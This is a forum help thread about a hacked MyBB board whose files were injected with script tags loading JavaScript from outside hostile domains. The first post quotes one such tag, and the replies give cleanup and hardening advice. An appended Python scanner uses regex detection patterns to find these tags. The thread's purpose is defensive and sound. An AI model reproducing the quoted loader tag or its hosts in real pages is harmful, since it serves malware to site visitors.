MyBB Community Forums

Full Version: how to delete a single line code in many .php or .html files
Hi
I hope I'm posting the right information in the right place. If not, I apologize.

A few days ago I noticed that smilies do not work and the panel with the font menu, bold, italic and so on has disappeared.
There are similar problems in the admin panel.
I could easily solve this by re-uploading and replacing the jscripts directory in the home and admin directories, but after a few days it happens again and can be solved by uploading again. But I can't do this 3 times a week.
I found out there is a bad script loading from my board from this address:

http://sogpaoiy.the-mlmpowercall.com/PC.js

There was the following code in almost every index.html file in my admin directory:
<html>
<head>
<title></title>
</head>
<body>
&nbsp;
</body>
</html>

<script type="text/javascript" src="http://sogpaoiy.the-mlmpowercall.com/PC.js"></script>
<!--8b054dfacfa60db8244c2c3da84f8cd3--> 

I could delete all of them because there were just 15 files.


But the problem does not end here.
There are nearly 150 files (mostly with index in their name) which include this:
http://asppoa.whcs.biz:8080/Backup.js
I'm sure that my board loads this too.

How can I delete this from my files? Are there more scripts like this?

I know changing host can solve it but I don't want to do this.
www.soccerproject.ir
You're best off deleting all your files and uploading them again via FTP with fresh copies. You will need to enter your MySQL details into ./inc/config.php again as well.
The easiest way would be to use Notepad++, because it can do the replacement of all files within a folder.

But it's much more important to know where that code came from than how to remove it.

Maybe you want to show your users, until you fix this, how to block those domains with the Windows hosts file. The .js probably contains the virus: Bloodhound.Exploit.292

Make sure your own antivirus is up to date as well.
(2010-06-15, 09:32 AM)Tim B. Wrote: [ -> ]You're best off deleting all your files and uploading them again via FTP with fresh copies. You will need to enter your MySQL details into ./inc/config.php again as well.

Thank you,
Do you mean all of the files in the directory where I've installed MyBB, or just the files which include that code?
What are MySQL details, and how should I enter them?

(2010-06-15, 12:58 PM)patrick Wrote: [ -> ]The easiest way would be to use Notepad++, because it can do the replacement of all files within a folder.

But it's much more important to know where that code came from than how to remove it.

Maybe you want to show your users, until you fix this, how to block those domains with the Windows hosts file. The .js probably contains the virus: Bloodhound.Exploit.292

Make sure your own antivirus is up to date as well.

Thank you,
Is there any problem if I download the whole public_html, find and delete the code, delete the old public_html and upload the new public_html (the one I've deleted the code from)?

That's right, but how can I understand where that code came from? I didn't install any untrusted plugin. I didn't upgrade any user to admin except my well-known and trusted friend. And I've changed my password (just on the board, not the host).
You can download and reupload the folder. It shouldn't cause any problems.

Besides clearing the .html/.xml/.js files, you should check the PHP files as well. An infected PHP file can cause this kind of issue.
You may want to change your host password as well, just in case.
(2010-06-15, 01:41 PM)shadow-man Wrote: [ -> ]Thank you,
Is there any problem if I download the whole public_html, find and delete the code, delete the old public_html and upload the new public_html (the one I've deleted the code from)?

That's right, but how can I understand where that code came from? I didn't install any untrusted plugin. I didn't upgrade any user to admin except my well-known and trusted friend. And I've changed my password (just on the board, not the host).

I would not recommend it. Unless you know what caused the exploit or what other code has been modified, you cannot guarantee that you will have removed all offending code bits.

I would upload fresh, change all passwords on the host account, MySQL passwords, forum admin password, FTP password (if not attached to your hosting password), etc.
I'm with pavemen on this! I have a dedicated server with around 25 domains on it. About a month ago I received an e-mail from the datacenter that they had detected a malicious script on ONE of the domains.

As a precaution I deleted the entire file set and the domain from the server, then recreated the domain and reuploaded an old backup copy of the website. I then checked through the file sets for every domain on the server, changed ALL passwords, and locked down the Brute Force Protection and Host Access Control.

Then I dug through the server logs and found that the domain had been compromised for over a month and access had been gained by at least 20 different I.P. addresses.

Hackers love to share their successes, and if you know that you got hit once it's very likely that you've been hit a lot more. The only real safe thing to do is delete everything and re-install.
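
Added example, not part of any post in this thread: a read-only Python scanner for a downloaded copy of the site that lists every .php/.html/.htm/.js/.xml file containing an external `<script src>` tag (flagging tags appended after `</html>`, as in the first post) or a 32-hex-digit comment marker. The function names, the allow-list parameter and the file-extension list are assumptions made for this example.

```python
import os
import re
import sys
from urllib.parse import urlparse

# <script ... src="URL"></script>, capturing URL.
SCRIPT_SRC = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>\s*</script>', re.I)
# 32-hex-digit HTML comment like the one that followed the tag in the first post.
HEX_MARKER = re.compile(r'<!--[0-9a-f]{32}-->', re.I)
SCAN_EXT = ('.php', '.html', '.htm', '.js', '.xml')


def find_injections(text, allowed_hosts=frozenset()):
    """Return (kind, detail) findings for one file's contents."""
    findings = []
    end_of_doc = text.lower().rfind('</html>')
    for m in SCRIPT_SRC.finditer(text):
        host = urlparse(m.group(1)).hostname
        if host is None or host in allowed_hosts:
            continue  # relative path or a host the site owner trusts
        # A tag placed after </html> was appended to the file, not authored.
        appended = 0 <= end_of_doc < m.start()
        findings.append(('script-after-html' if appended else 'external-script',
                         m.group(1)))
    findings += [('hex-marker', m.group(0)) for m in HEX_MARKER.finditer(text)]
    return findings


def scan_tree(root, allowed_hosts=()):
    """Walk root; map each file with findings to its list of findings."""
    allowed = frozenset(allowed_hosts)
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = find_injections(fh.read(), allowed)
            if hits:
                report[path] = hits
    return report


if __name__ == '__main__':
    # Usage: python scan.py [path/to/downloaded/public_html] [trusted.host ...]
    root = sys.argv[1] if len(sys.argv) > 1 else '.'
    for path, hits in sorted(scan_tree(root, sys.argv[2:]).items()):
        for kind, detail in hits:
            print(f'{path}\t{kind}\t{detail}')
```

The report only shows how far this one pattern has spread; it does not find other modifications, which is why the replies above recommend fresh files and new passwords.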